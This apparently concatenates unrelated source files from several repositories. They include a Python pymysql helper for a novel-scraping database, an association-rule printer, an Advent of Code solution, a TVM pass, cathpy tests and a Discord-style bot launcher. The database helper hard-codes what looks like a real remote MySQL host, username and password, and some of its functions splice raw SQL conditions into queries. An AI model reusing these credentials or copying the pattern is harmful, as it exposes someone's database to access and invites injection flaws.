] | 2 | 2019-03-23T16:05:16.000Z | 2021-04-19T02:14:09.000Z | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
] | null | null | null | Scrapy_zzuliacgn/tools/DAO.py | DeSireFire/zzuliacgnSyders | 0e4d6b9663771d8ddc65598bae58a5b4b8c22e88 | [
"MIT"
] | 1 | 2020-10-11T15:33:31.000Z | 2020-10-11T15:33:31.000Z | # import MySQLdb,sys,datetime
import pymysql,sys,datetime
# from zzuliACGN.settings import DATABASES
# Connection parameters consumed by connect() below.
# WARNING: real credentials are hard-coded here; move them to environment
# variables or an untracked config file before publishing this code.
connect_dict = {
    # "host":DATABASES["default"]["HOST"],
    # "port":int(DATABASES["default"]["PORT"]),
    # "user":DATABASES["default"]["USER"],
    # "passwd":DATABASES["default"]["PASSWORD"],
    # "db":DATABASES["default"]["NAME"],
    # "host": '192.168.0.102',
    # # "host": '192.168.37.128',
    # "port": 3306,
    # "user": 'zzuliACGN',
    # "passwd": 'DeSireFire233notRoot',
    # "db": 'zzuli_ACGN',
    "host": '45.77.254.61',
    "port": 3306,
    "user": 'qidianTest',
    "passwd": '8cSJAKZY4PkLJMyX',
    "db": 'qidianTest',
}
# Create a database connection object.
def connect(connect_dict):
    """Open and return a pymysql connection described by *connect_dict*.

    :param connect_dict: dict with "host", "port", "user", "passwd" and
        "db" keys (see the module-level ``connect_dict``)
    :return: an open pymysql connection using the utf8 charset
    """
    try:
        conn = pymysql.connect(
            host=connect_dict["host"],
            user=connect_dict["user"],
            password=connect_dict["passwd"],
            database=connect_dict["db"],
            port=connect_dict["port"],
            charset='utf8',
        )
        return conn
    except Exception as e:
        # Fixed: the old message wrongly said "FTP" for a MySQL failure,
        # and sys.exit(0) signalled *success* to the shell on error.
        print("数据库连接失败,请检查主机号、用户名、密码是否正确:%s" % e)
        sys.exit(1)
# Close the database connection.
def mysql_close(connect):
    """Close the given database connection object."""
    connect.close()
# Print the server version reported by the database.
def mysql_version(connect):
    """Query and print the database server version.

    :param connect: open database connection
    """
    cursor = connect.cursor()
    cursor.execute("SELECT VERSION()")
    version_row = cursor.fetchone()
    print(version_row)
# List every table name in a schema.
def tables_list(connect, db_name='zzuli_ACGN'):
    """Return ``(table_name, table_rows)`` tuples for every table in *db_name*.

    Each table name is also printed as a side effect.

    :param connect: open database connection
    :param db_name: schema name to inspect
    :return: nested tuples from INFORMATION_SCHEMA, or None on error
    """
    try:
        cur = connect.cursor()
        # Fixed: pass db_name as a bound parameter instead of %-string
        # interpolation — avoids SQL injection and quoting bugs.
        cur.execute(
            "SELECT TABLE_NAME,TABLE_ROWS FROM INFORMATION_SCHEMA.TABLES "
            "WHERE TABLE_SCHEMA=%s;", (db_name,))
        data = cur.fetchall()
        for i in data:
            print(i[0])
        return data
    except Exception as e:
        print("查询数据库中所有表名 时发生错误:%s" % e)
# List the column names of one table in one schema.
def column_name(connect, db_name='zzuli_ACGN', table_name='ZA_Novel_novel_info'):
    """Return the column names of *table_name* in *db_name*.

    Each column name is also printed as a side effect.

    :param connect: open database connection
    :param db_name: schema name
    :param table_name: table name
    :return: nested tuples of column names, or None on error
    """
    try:
        cur = connect.cursor()
        # Fixed: bind both identifiers as query parameters instead of
        # %-string interpolation — avoids SQL injection and quoting bugs.
        cur.execute(
            "select column_name from information_schema.columns "
            "where table_schema=%s and table_name=%s;", (db_name, table_name))
        data = cur.fetchall()
        for i in data:
            print(i[0])
        return data
    except Exception as e:
        print("查询指定数据库中指定表的所有字段名 时发生错误:%s" % e)
# Insert a single row.
def insert_into(connect, table_name, data):
    """Insert one row built from *data* into *table_name*.

    Commits on success, rolls back on any error.

    :param connect: open database connection
    :param table_name: target table
    :param data: dict mapping column name -> value
    """
    cursor = connect.cursor()
    print(data.keys())
    columns = ",".join(data.keys())
    placeholders = ",".join(['%s'] * len(data))
    sql = "INSERT INTO {table}({keys}) VALUES ({values})".format(
        table=table_name, keys=columns, values=placeholders)
    print(sql)
    try:
        if cursor.execute(sql, tuple(data.values())):
            print("中出成功!")
            connect.commit()
    except Exception as e:
        print("插入数据 时发生错误:%s" % e)
        connect.rollback()
# Bulk insert via executemany.
def insert_by_many(connect, table_name, data):
    """Bulk-insert rows into *table_name* with ``executemany``.

    The column list is taken from the table itself, skipping the first
    (auto-increment id) column, so each tuple in *data* must match the
    remaining columns in order.

    :param connect: open database connection
    :param table_name: target table
    :param data: sequence of value tuples
    """
    cursor = connect.cursor()
    # Fixed: the original queried information_schema twice (and printed
    # every column twice) just to rebuild the same list; fetch it once.
    columns = [x[0] for x in column_name(connect, table_name=table_name)[1:]]
    mykeys = ",".join(columns)
    myvalues = ",".join(['%s'] * len(columns))
    sql = "INSERT INTO {table} ({keys}) VALUES({values})".format(
        table=table_name, keys=mykeys, values=myvalues)
    try:
        if cursor.executemany(sql, data):
            print("批量中出成功!")
            connect.commit()
    except Exception as e:
        print("批量插入executemany 时发生错误:%s" % e)
        connect.rollback()
# Insert a row, silently skipping duplicate-key conflicts.
def insert_IGNORE(connect, table_name, data):
    """Insert *data* into *table_name* only if it does not already exist.

    Uses MySQL's ``INSERT IGNORE`` so rows violating a unique key are
    skipped instead of raising.

    :param connect: open database connection
    :param table_name: target table
    :param data: dict mapping column name -> value
    """
    cursor = connect.cursor()
    columns = ",".join(data.keys())
    placeholders = ",".join(['%s'] * len(data))
    sql = "INSERT IGNORE INTO {table}({keys}) VALUES ({values})".format(
        table=table_name, keys=columns, values=placeholders)
    try:
        if cursor.execute(sql, tuple(data.values())):
            print("忽略中出成功!")
            connect.commit()
    except Exception as e:
        print("忽略以存在数据插入 时发生错误:%s" % e)
        connect.rollback()
# Insert a row, replacing any existing row with the same key.
def replace_INTO(connect, table_name, data):
    """Insert *data* with MySQL ``REPLACE INTO`` semantics.

    An existing row with the same PRIMARY/UNIQUE key is deleted and
    re-inserted.

    :param connect: open database connection
    :param table_name: target table
    :param data: dict mapping column name -> value
    """
    cursor = connect.cursor()
    columns = ",".join(data.keys())
    placeholders = ",".join(['%s'] * len(data))
    sql = "REPLACE INTO {table}({keys}) VALUES ({values})".format(
        table=table_name, keys=columns, values=placeholders)
    try:
        if cursor.execute(sql, tuple(data.values())):
            print("替换插入成功!")
            connect.commit()
    except Exception as e:
        # Fixed: the message was copy-pasted from insert_IGNORE and
        # described the wrong operation.
        print("替换方式数据插入 时发生错误:%s" % e)
        connect.rollback()
# Explicitly commit the current transaction.
def sql_commit(connect):
    """Commit any pending changes on *connect*."""
    connect.commit()
# Upsert a row (INSERT ... ON DUPLICATE KEY UPDATE).
def sql_update(connect, table_name, data):
    """Upsert *data* into *table_name*.

    The target table must have a PRIMARY KEY or UNIQUE constraint for
    the duplicate-key branch to trigger.

    :param connect: open database connection
    :param table_name: target table
    :param data: dict mapping column name -> value
    """
    cursor = connect.cursor()
    mykeys = ",".join(data.keys())
    myvalues = ",".join(['%s'] * len(data))
    myUpdate = ",".join([" {key} = %s".format(key=key) for key in data])
    sql = "INSERT INTO {table}({keys}) VALUES ({values}) ON DUPLICATE KEY UPDATE".format(
        table=table_name, keys=mykeys, values=myvalues)
    sql += myUpdate
    try:
        # values appear twice: once for INSERT, once for the UPDATE list
        if cursor.execute(sql, tuple(data.values()) * 2):
            print("更新成功!")
            connect.commit()
    except Exception as e:
        print("更新数据 时发生错误:%s" % e)
        # Fixed: roll back on failure, consistent with the other writers.
        connect.rollback()
# Delete rows matching a raw predicate.
def delete(connect, table_name, conditon):
    """Delete rows from *table_name* matching the raw SQL *conditon*.

    :param connect: open database connection
    :param table_name: target table
    :param conditon: raw SQL predicate string, e.g. ``"age > 20"``
        (interpolated verbatim — never build it from untrusted input)
    """
    cursor = connect.cursor()
    sql = "DELETE FROM {table} WHERE {conditon}".format(table=table_name, conditon=conditon)
    print(sql)
    try:
        cursor.execute(sql)
        connect.commit()
    except Exception as e:
        # Fixed: the message said "插入数据" (insert), copy-pasted from
        # insert_into; also roll back the failed transaction.
        print("删除数据 时发生错误:%s" % e)
        connect.rollback()
# Query rows matching a raw predicate and print them.
def demand(connect, table_name, conditon):
    """Run ``SELECT *`` with the raw predicate *conditon* and print each row.

    :param connect: open database connection
    :param table_name: table to query
    :param conditon: raw SQL predicate string
    """
    cursor = connect.cursor()
    sql = "SELECT * FROM {table} WHERE {conditon}".format(table=table_name, conditon=conditon)
    try:
        cursor.execute(sql)
        print("查询到数量: %s 条" % (cursor.rowcount))
        while True:
            row = cursor.fetchone()
            if not row:
                break
            print("row:", row)
    except Exception as e:
        print("查询数据 时发生错误:%s" % e)
# Empty a table and reset its auto-increment counter.
def Refresh_ID(connect, table_name):
    """Delete every row of *table_name* and reset AUTO_INCREMENT to 1.

    :param connect: open database connection
    :param table_name: table to truncate (via DELETE + ALTER)
    """
    cursor = connect.cursor()
    statements = (
        "DELETE FROM {table}".format(table=table_name),
        "ALTER TABLE {table} AUTO_INCREMENT = 1;".format(table=table_name),
    )
    try:
        for statement in statements:
            cursor.execute(statement)
        connect.commit()
    except Exception as e:
        print("删除表数据并重置ID 时发生错误:%s" % e)
# Manual test driver exercising the helpers above (not a unit test).
def main():
    """Connect to the database, run a few helper calls, then close.

    Most example calls are intentionally commented out; enable the ones
    you want to try. NOTE: the live calls below wipe the Qidian tables.
    """
    # open a database connection
    db = connect(connect_dict)
    try:
        # sample row for the insert examples below
        insert_dict = {
            # 'novel_id': '1',
            # 'novel_name': 'test',
            # 'novel_intro': 'test',
            # 'novel_headerImage': 'test',
            # 'novel_worksNum': '233',
            # 'novel_saveTime': datetime.date.today(),
            # 'novel_updateTime': datetime.date.today(),
            # 'novel_types_id': '1',
            # 'novel_writer_id': '1',
            "id":6,
            "Type_title":"test666",
            "isDelete":"0",
        }
        # tables_list(db)
        print("*"*50)
        # column_name(db,table_name="ZA_Novel_type")
        print("*" * 50)
        # single-row insert
        # insert_into(db, "ZA_Novel_type", insert_dict)
        print("*" * 50)
        # bulk insert
        newlist = []
        # typelist = ["玄幻","奇幻","武侠","仙侠","都市","现实","军事","历史","游戏","体育","科幻","灵异","女生","轻小说",]
        # typelist = ["动画","季度全集","漫画","港台漫画","日版漫画","音乐","动漫音乐","同人音乐","流行音乐","日剧","RAW","游戏","电脑游戏","电视游戏","掌机游戏","网络游戏","游戏周边","特摄","其他",]
        # for i in typelist:
        #     temp = (i,0)
        #     newlist.append(temp)
        # print(newlist)
        # insert_by_many(db,"ZA_Novel_type",newlist)
        # insert_by_many(db,"ZA_BT_rtypes",newlist)
        print("*" * 50)
        # insert, ignoring duplicate keys
        # insert_IGNORE(db,"ZA_Novel_type", insert_dict)
        print("*" * 50)
        # replace-style insert
        # replace_INTO(db,"ZA_Novel_type", insert_dict)
        print("*" * 50)
        # upsert/update
        # insert_dict = {
        #     "id": 7,
        #     "Type_title":"test666",
        #     "isDelete":"0",
        # }
        # sql_update(db,"ZA_Novel_type", insert_dict)
        # print("*" * 50)
        # # 数据删除
        # conditon = "Type_title = 'test'"
        # # conditon = "REGEXP '^test';"
        # delete(db,"ZA_Novel_type", conditon)
        # print("*" * 50)
        # # 查询数据
        # conditon = "Type_title REGEXP '^test'"
        # demand(db,"ZA_Novel_type", conditon)
        print("*" * 50)
        # # 删除表数据并重置ID
        # Refresh_ID(db, "ZA_BT_rtypes")
        # Refresh_ID(db, "ZA_BT_items")
        # Refresh_ID(db, "ZA_Novel_detail")
        # Refresh_ID(db, "ZA_Novel_info")
        # live: wipe the Qidian tables and reset their id counters
        Refresh_ID(db, "QidianChapterItem")
        Refresh_ID(db, "QidianItem")
        Refresh_ID(db, "QidianWriterItem")
        print("*" * 50)
        # query
    except Exception as e:
        print("总函数 时发生错误:%s"%e)
    finally:
        # always release the connection, even after an error
        db.close()
# Run the manual driver when this module is executed directly.
if __name__ == '__main__':
    main()

# try:
#     # 使用cursor()方法获取操作游标
#     cursor = connect.cursor()
#     cursor.execute()
# except Exception as e:
#     print("插入数据 时发生错误:%s"%e)
795add9de97acb060ac955484d90adbe7221684b | 2,132 | py | Python | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 3 | 2020-08-03T19:25:44.000Z | 2021-06-27T22:25:55.000Z | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | null | null | null | mdrsl/rule_generation/association_rule_mining/apyori_impl/apyori_utils.py | joschout/Multi-Directional-Rule-Set-Learning | ef0620b115f4e0fd7fba3e752d238a8020c1ca6b | [
"Apache-2.0"
] | 2 | 2020-08-07T22:54:28.000Z | 2021-02-18T06:11:01.000Z | try:
from rule_generation.association_rule_mining.apyori_impl.apyori import RelationRecord
except ModuleNotFoundError:
from collections import namedtuple
# Ignore name errors because these names are namedtuples.
SupportRecord = namedtuple( # pylint: disable=C0103
'SupportRecord', ('items', 'support'))
RelationRecord = namedtuple( # pylint: disable=C0103
'RelationRecord', SupportRecord._fields + ('ordered_statistics',))
OrderedStatistic = namedtuple( # pylint: disable=C0103
'OrderedStatistic', ('items_base', 'items_add', 'confidence', 'lift',))
def print_relation_record(relation_record: RelationRecord):
"""
From http://www.zaxrosenberg.com/unofficial-apyori-documentation/
Each RelationRecord reflects all rules associated with a specific itemset (items) that has relevant rules.
Support (support), given that it’s simply a count of appearances of those items together,
is the same for any rules involving those items, and so only appears once per RelationRecord.
The ordered_statistic reflects a list of all rules that met our min_confidence and min_lift requirements
(parameterized when we called apriori() ).
Each OrderedStatistic contains the antecedent (items_base)
and consequent (items_add) for the rule, as well as the associated confidence and lift .
:param relation_record:
:return:
"""
# first index of the inner list
# Contains base item and add item=
items = relation_record.items
support = relation_record.support
print("itemset:", items)
print("support:", support)
# ordered_statistics = record.ordered_statistics[0]
print("Rules generated from itemset")
for ordered_statistic in relation_record.ordered_statistics:
antecedent = ordered_statistic.items_base
consequent = ordered_statistic.items_add
confidence = ordered_statistic.confidence
lift = ordered_statistic.lift
print("Rule: " + ",".join([str(i) for i in antecedent]) + " -> " + ",".join([str(i) for i in consequent]), ', conf:', confidence, ', lift:', lift)
| 42.64 | 154 | 0.719043 |
795aded19d26bab6fbdbd7d82b48a18c3869dd0c | 3,772 | py | Python | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | Day-19/sol.py | archanpatkar/advent2015 | a207283c85745055dce9a2d69c21214f1f4cefbb | [
"MIT"
] | null | null | null | from pprint import pprint
from functools import reduce
from itertools import *
from collections import defaultdict
# from queue import PriorityQueue
# from difflib import SequenceMatcher
from random import choice
data = open("input.txt","r").read().split("\n")
molecule = data[-1]
transforms = defaultdict(lambda: [])
reverse = {}
for p,e in [s.strip().split("=>") for s in data[:-2]]:
transforms[p.strip()].append(e.strip())
reverse[e.strip()] = p.strip()
pprint(transforms)
print(molecule)
cache = {}
def replace(molecules):
if isinstance(molecules, str):
if molecules in cache: return cache[molecules]
else: cache[molecules] = replace([molecules])
return cache[molecules]
distinct = set()
if isinstance(molecules,list):
for molecule in molecules:
if molecule in cache: distinct.update(cache[molecule])
else:
permol = set()
molecule_str = molecule
molecule = list(molecule)
for i in range(len(molecule)):
if molecule[i] in transforms:
for ch in transforms[molecule[i]]:
nm = [*molecule]
nm[i] = ch
permol.add("".join(nm))
if i+1 < len(molecule) and (molecule[i] + molecule[i+1] in transforms):
for ch in transforms[molecule[i]+molecule[i+1]]:
nm = [*molecule]
nm.pop(i)
nm.pop(i)
nm.insert(i,ch)
permol.add("".join(nm))
cache[molecule_str] = permol
distinct.update(permol)
return distinct
# part 1
print(len(replace(molecule)))
# part2
# Read some reddit hints as well as some solutions which recommended
# using randomness for substituting in reverse order to the root node
curr = molecule
steps = 0
while curr != "e":
rep,sub = choice(list(reverse.items()))
if rep in curr:
curr = curr.replace(rep,sub,1)
steps += 1
print(steps)
# A* algo for finding the molecule but takes too long to compute!
# def closeness(str,str2):
# if len(str) > len(str2): return None
# flag = True
# continous = 0
# nm = 0
# for i in range(len(str)):
# if str[i] == str2[i] and flag:
# continous += 1
# else:
# nm += 1
# flag = False
# return nm-continous
# def similar(a, b):
# return SequenceMatcher(None, a, b).ratio()
# start = "e"
# end = molecule
# current_nodes = set(["e"])
# queue = PriorityQueue()
# queue.put((0,start))
# distance = defaultdict(lambda: -1)
# distance[start] = 0
# step = 0
# len_end = len(end)
# while not queue.empty():
# print("step:",step)
# priority,current = queue.get()
# # current_nodes.remove(current)
# if current == end: break
# for next in replace(current):
# # print("next:",next)
# # print("closeness:",closeness(next,end))
# if len(next) > len_end: continue
# print("diff:",len(molecule)-len(next))
# cost = distance[current] + 1
# if (not next in distance) or cost < distance[next]:
# distance[next] = cost
# # cost +
# priority = similar(next,end) * 10
# print("priority:",-priority)
# # visited.add(next)
# # if:
# # (next not in current_nodes) and
# # if priority != None:
# # (cost + (-priority)
# queue.put((-priority,next))
# # current_nodes.add(next)
# if end in distance: break
# step += 1
# print(distance[end]) | 30.918033 | 94 | 0.541092 |
795adfc2fb1f12f817ba7ce5467156a3f2354e66 | 1,622 | py | Python | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 4,640 | 2017-08-17T19:22:15.000Z | 2019-11-04T15:29:46.000Z | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 3,022 | 2020-11-24T14:02:31.000Z | 2022-03-31T23:55:31.000Z | python/tvm/relay/backend/contrib/ethosu/preprocess.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 1,352 | 2017-08-17T19:30:38.000Z | 2019-11-04T16:09:29.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, import-outside-toplevel
"""Set of passes to pre-process the IRModule to support Arm(R)-Ethos(TM)-U
NPU code generation. These set of passes will mutate both the main and the
external functions.
"""
import tvm # type: ignore
from . import _ffi_api # type: ignore
def preprocess_ext_io() -> tvm.transform.Pass:
"""This pass mutates the number of inputs going to / outputs coming out to/from
external functions to one. This is achieved via concatenation
of inputs and splitting of outputs in around the call to the external function.
Returns
-------
ret : tvm.transform.Pass
The registered pass to mutate the IO of the external functions and their calls.
"""
return _ffi_api.PreprocessExternalFuncIO() # type: ignore # pylint: disable=no-member
| 43.837838 | 90 | 0.751541 |
795adfca4c63aa2eb9d1ede5987e4d38cb030f2a | 8,248 | py | Python | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | tests/util_test.py | shouldsee/cathpy | 5f7fa1322434b2d254f0158c5840f029b12dbafe | [
"MIT"
] | null | null | null | import logging
import difflib
import os
import tempfile
from cathpy.core import error as err
from cathpy.core.util import (StructuralClusterMerger,
AlignmentSummaryRunner, GroupsimRunner, GroupsimResult, )
from cathpy.core.datafiles import ReleaseDir
from cathpy.core.align import Align
from cathpy.core import util
from .testutils import TestBase, log_title, log_level
LOG = logging.getLogger(__name__)
class TestUtil(TestBase):
    """Integration tests for the helpers in ``cathpy.core.util``.

    All fixtures live under ``tests/data`` relative to this file and are
    resolved once in :meth:`setUp`. The numeric expectations (DOPS
    scores, gap counts, sequence counts) are tied to those exact
    fixture files.
    """

    def setUp(self):
        """Resolve the shared fixture paths and CATH release metadata."""
        self.cath_version = 'v4.2'
        self.data_dir = os.path.join(
            os.path.dirname(os.path.abspath(__file__)), 'data')
        self.sc_file = os.path.join(self.data_dir,
                                    '1.10.8.10__FF_SSG9__6.aln_reps.cora.fa')
        self.ff_dir = os.path.join(self.data_dir, 'funfams')
        self.ff_file = os.path.join(
            self.ff_dir, '1.10.8.10-ff-14534.reduced.sto')
        self.ff_tmpl = '__SFAM__-ff-__FF_NUM__.reduced.sto'
        self.merge_sto_file = os.path.join(self.data_dir, 'merge.sto')
        self.example_fasta_file = self.sc_file
        self.example_sto_file = self.ff_file
        self.cath_release = ReleaseDir(
            self.cath_version, base_dir=self.data_dir)

    def test_alignment_summary_file(self):
        """Summarising a single STOCKHOLM file yields one entry with known stats."""
        runner = AlignmentSummaryRunner(
            aln_file=self.merge_sto_file)
        entries = runner.run()
        self.assertEqual(len(entries), 1)
        summary = entries[0]
        self.assertEqual(summary.aln_length, 92)
        self.assertEqual(summary.dops, 88.422)
        self.assertEqual(summary.gap_count, 25228)
        self.assertEqual(summary.total_positions, 64492)
        self.assertEqual(summary.seq_count, 701)
        self.assertEqual(round(summary.gap_per, 2), round(39.12, 2))

    def test_alignment_summary_dir(self):
        """Directory mode counts only top-level files unless recursive=True."""
        runner = AlignmentSummaryRunner(
            aln_dir=self.data_dir, suffix='.sto')
        entries = runner.run()
        self.assertEqual(len(entries), 3)
        runner = AlignmentSummaryRunner(
            aln_dir=self.data_dir, suffix='.sto', recursive=True)
        entries = runner.run()
        self.assertEqual(len(entries), 7)

    @log_title
    def test_merge(self):
        """Merging funfams into the SC alignment reproduces the reference merge.sto."""
        tmp_fasta_file = tempfile.NamedTemporaryFile(
            mode='w+', suffix='.fa', delete=True)
        tmp_sto_file = tempfile.NamedTemporaryFile(
            mode='w+', suffix='.sto', delete=False)
        LOG.info("Creating SC merger...")
        merger = StructuralClusterMerger(cath_version=self.cath_version,
                                         sc_file=self.sc_file,
                                         out_sto=tmp_sto_file.name,
                                         out_fasta=tmp_fasta_file.name,
                                         ff_dir=self.ff_dir,
                                         ff_tmpl=self.ff_tmpl,
                                         cath_release=self.cath_release)
        LOG.info("Merging SC alignment {}".format(self.sc_file))
        merge_aln = merger.run()
        self.assertEqual(merge_aln.count_sequences, 701)
        with open(tmp_sto_file.name) as f:
            sto_got = f.read()
        with open(self.merge_sto_file) as f:
            sto_expected = f.read()
        LOG.info("Checking {} versus {}".format(
            tmp_sto_file.name, self.merge_sto_file))
        self.assertMultiLineEqual(sto_got, sto_expected)

    def test_funfam_file_finder(self):
        """Finder locates a funfam by domain id and rejects bad ids."""
        finder = util.FunfamFileFinder(
            base_dir=self.ff_dir, ff_tmpl='__SFAM__-ff-__FF_NUM__.reduced.sto')
        self.assertIsInstance(finder, util.FunfamFileFinder)
        ff_file = finder.search_by_domain_id('2damA00')
        self.assertEqual(os.path.basename(ff_file),
                         '1.10.8.10-ff-14534.reduced.sto')
        # valid-looking id that matches no funfam
        with self.assertRaises(err.NoMatchesError):
            finder.search_by_domain_id('1zzzA01')
        # malformed domain ids
        with self.assertRaises(err.InvalidInputError):
            finder.search_by_domain_id('bingo')
        with self.assertRaises(err.InvalidInputError):
            finder.search_by_domain_id(' file with &*! characters and spaces ')

    def test_ff_id_from_file(self):
        """A funfam filename round-trips back to its superfamily/cluster id."""
        finder = util.FunfamFileFinder(
            base_dir=self.ff_dir, ff_tmpl='__SFAM__-ff-__FF_NUM__.reduced.sto')
        ff_file = finder.search_by_domain_id('2damA00')
        ff_id = finder.funfam_id_from_file(ff_file)
        self.assertEqual(ff_id.sfam_id, '1.10.8.10')
        self.assertEqual(ff_id.cluster_num, 14534)

    @log_level('cathpy.core.util', 'DEBUG')
    def test_scorecons(self):
        """Scorecons runs on both FASTA and STOCKHOLM input with known DOPS."""
        sc = util.ScoreconsRunner()
        aln = Align.from_fasta(self.example_fasta_file)
        sc_res = sc.run_fasta(self.example_fasta_file)
        self.assertEqual(sc_res.dops, 92.889)
        self.assertEqual(len(sc_res.scores), aln.aln_positions)
        del aln
        aln = Align.from_stockholm(self.example_sto_file)
        sc_res = sc.run_stockholm(self.example_sto_file)
        self.assertEqual(sc_res.dops, 61.529)
        self.assertEqual(len(sc_res.scores), aln.aln_positions)

    def test_groupsim(self):
        """Groupsim scores appear as a #=GC annotation when written to STOCKHOLM."""
        gs = util.GroupsimRunner()
        aln = Align.from_fasta(self.example_fasta_file)
        seqs = aln.seqs
        # groupsim needs at least two clusters of sequences
        for s in seqs[:2]:
            s.set_cluster_id('0001')
        for s in seqs[2:]:
            s.set_cluster_id('0002')
        gs_res = gs.run_alignment(aln)
        self.assertEqual(gs_res.count_positions, aln.aln_positions)
        LOG.info("GS: {}".format(repr(gs_res.__dict__)))
        sto_file = tempfile.NamedTemporaryFile(delete=False, suffix='.sto')
        sto_with_groupsim_file = tempfile.NamedTemporaryFile(delete=False,
                                                             suffix='.groupsim.sto')
        LOG.info("Writing STOCKHOLM file (without groupsim): %s", sto_file.name)
        aln.write_sto(sto_file.name)
        LOG.info("Adding groupsim data ... ")
        aln.add_groupsim()
        LOG.info("Writing STOCKHOLM file (with groupsim): %s",
                 sto_with_groupsim_file.name)
        aln.write_sto(sto_with_groupsim_file.name)
        # the only diff between the two files should be the groupsim line
        with open(sto_file.name) as f1:
            with open(sto_with_groupsim_file.name) as f2:
                lines1 = f1.readlines()
                lines2 = f2.readlines()
                ndiff = difflib.ndiff(lines1, lines2)
                difflines = [l for l in ndiff if not l.startswith(' ')]
                LOG.info("DIFF: %s", ''.join(difflines))
        expected_groupsim = '#=GC groupsim --------------10014101040141141031--2151411010022021221001040000---0-1-10-----\n'
        self.assertEqual(''.join(difflines), '+ ' + expected_groupsim)

    def test_groupsim_runner(self):
        """Runner raises without cluster ids, succeeds once they are set."""
        aln = Align.from_fasta(self.example_fasta_file)
        # need to set the cluster id on sequences
        runner = GroupsimRunner()
        with self.assertRaises(err.InvalidInputError):
            runner.run_alignment(aln)
        for seq_idx, seq in enumerate(aln.sequences):
            seq.set_cluster_id('cluster1' if seq_idx < 5 else 'cluster2')
        result = runner.run_alignment(aln)
        self.assertIsInstance(result, GroupsimResult)

    def test_cluster_file(self):
        """ClusterFile parses both '__'-joined and '-'-joined filename styles."""
        sc_path = os.path.abspath(self.sc_file)
        sc_dir = os.path.dirname(sc_path)
        sc_file = util.ClusterFile(sc_path)
        # 1.10.8.10__FF_SSG9__6.aln_reps.cora.fa
        self.assertDictEqual(sc_file.__dict__, {
            'path': sc_dir,
            'sfam_id': '1.10.8.10',
            'cluster_type': 'FF_SSG9',
            'cluster_num': '6',
            'desc': '.aln_reps.cora',
            'suffix': '.fa',
            'join_char': '__',
        })
        self.assertEqual(sc_file.to_string(), sc_path)
        ff_path = os.path.abspath(self.ff_file)
        ff_dir = os.path.dirname(ff_path)
        ff_file = util.ClusterFile(ff_path)
        # 1.10.8.10-ff-14534.reduced.sto
        self.assertDictEqual(ff_file.__dict__, {
            'path': ff_dir,
            'sfam_id': '1.10.8.10',
            'cluster_type': 'ff',
            'cluster_num': '14534',
            'desc': '.reduced',
            'suffix': '.sto',
            'join_char': '-',
        })
        self.assertEqual(ff_file.to_string(), ff_path)
795ae046d60759c0cb5facdcd67c5cab72cb4a57 | 315 | py | Python | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | fa_bot.py | darkChozo/folkbot | 64c1c59654b9d6af4b4fc41f0f48c65e1ea3e8b2 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python
import bot
import logging
# Full sail ahoy!
if __name__ == '__main__':
fa_bot = bot.FAbot.FAbot("config.ini")
try:
fa_bot.start()
except KeyboardInterrupt:
print "Disconnecting..."
logging.info("Keyboard interrupt. Disconnecting.")
fa_bot.stop()
| 22.5 | 58 | 0.644444 |
795ae05a8c000b4fc270b7aff08457fd4ef6094f | 2,183 | py | Python | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
] | 19 | 2019-12-03T17:28:07.000Z | 2021-09-10T21:30:52.000Z | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
] | 32 | 2019-12-16T11:18:35.000Z | 2021-03-19T03:33:15.000Z | saleor/product/__init__.py | elwoodxblues/saleor | 5e4e4a4259a011d24b04ebd24c77c689de843fa1 | [
"CC-BY-4.0"
] | 20 | 2020-02-03T00:38:59.000Z | 2022-01-03T13:07:52.000Z | from django.utils.translation import pgettext_lazy
class ProductAvailabilityStatus:
    """Machine-readable product availability states with translated labels."""

    NOT_PUBLISHED = "not-published"
    VARIANTS_MISSSING = "variants-missing"
    OUT_OF_STOCK = "out-of-stock"
    LOW_STOCK = "low-stock"
    NOT_YET_AVAILABLE = "not-yet-available"
    READY_FOR_PURCHASE = "ready-for-purchase"

    @staticmethod
    def get_display(status):
        """Return the translated label for *status*.

        Raises NotImplementedError for unrecognised statuses.
        """
        labels = {
